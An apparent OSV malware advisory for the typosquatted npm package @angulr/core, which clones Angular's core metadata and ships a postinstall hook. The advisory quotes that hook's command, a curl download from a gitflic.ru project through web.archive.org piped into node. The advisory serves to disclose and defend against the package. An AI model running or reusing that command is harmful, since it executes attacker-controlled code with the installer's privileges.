@angulr/core@22.2.1
Vulnerability report · Last retrieved from osv.dev October 5, 2026 at 7:27 AM UTC
OSV ID
MAL-2026-17538
Ecosystem
npm
Summary
The npm package @angulr/core masquerades as Angular's @angular/core by cloning its package.json metadata (description 'Angular - the core framework', author 'angular', repository angular/angular, ng-update packageGroup) while shipping a hostile postinstall script. The postinstall hook runs curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js |... node, piping an unpinned, remotely fetched JavaScript payload directly into Node at install time. The destination is a personal hellscripter project on gitflic.ru fronted via web.archive.org, unrelated to Angular's publisher. Any developer running npm install @angulr/core executes attacker-controlled code with the installer's privileges, with no integrity check and no pinning.
Source: amazon-inspector (c24dfd4b0a686b9056ff662e6fee53edfe23c7a94a5edf93fb4cace176216518)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.